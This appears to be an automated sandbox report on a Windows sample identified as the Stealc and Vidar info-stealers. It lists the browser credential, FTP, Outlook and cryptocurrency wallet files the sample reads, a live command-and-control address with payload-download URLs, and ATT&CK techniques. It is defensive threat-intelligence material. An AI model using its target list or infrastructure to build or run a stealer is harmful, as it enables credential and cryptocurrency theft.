Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734725607.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	URL Reputation	malware
http://185.215.113.37	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	URL Reputation	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	URL Reputation	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	URL Reputation	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/e2b1563c6670f193.phpl6	file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/a	file.exe, 00000000.00000002.1931818281.0000000000887000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/chrome_newtab	AKFHCAKJ.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	AKFHCAKJ.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	AKFHCAKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1804973566.000000001D15C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php36	file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpy6	file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php.dll	file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	BFCFBFBFBKFIDHJKFCAF.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpowsApps	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phppc	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php4cF	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	AKFHCAKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll&Q	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phplc	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	false		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958458408.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpR	file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	AKFHCAKJ.0.dr	false		unknown
http://185.215.113.37_S	file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpPb	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpZ	file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AKFHCAKJ.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpLb	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpA6	file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1804973566.000000001D15C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t	file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://www.ecosia.org/newtab/	AKFHCAKJ.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	AKFHCAKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phplS6	file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpnomi	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpre	file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org	AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php.dll16X	file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	AKFHCAKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dlle	file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532570
Start date and time:	2024-10-13 17:45:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 78 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	ND2WP0Fip7.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	C5u5BZq8gj.exe	Get hash	malicious	Vidar	Browse
	hD2EOjfpfW.exe	Get hash	malicious	Vidar	Browse
	AVSicb6epR.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	ND2WP0Fip7.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	C5u5BZq8gj.exe	Get hash	malicious	Vidar	Browse
	hD2EOjfpfW.exe	Get hash	malicious	Vidar	Browse
	AVSicb6epR.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEHIDAKECFIEBGDHJEBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
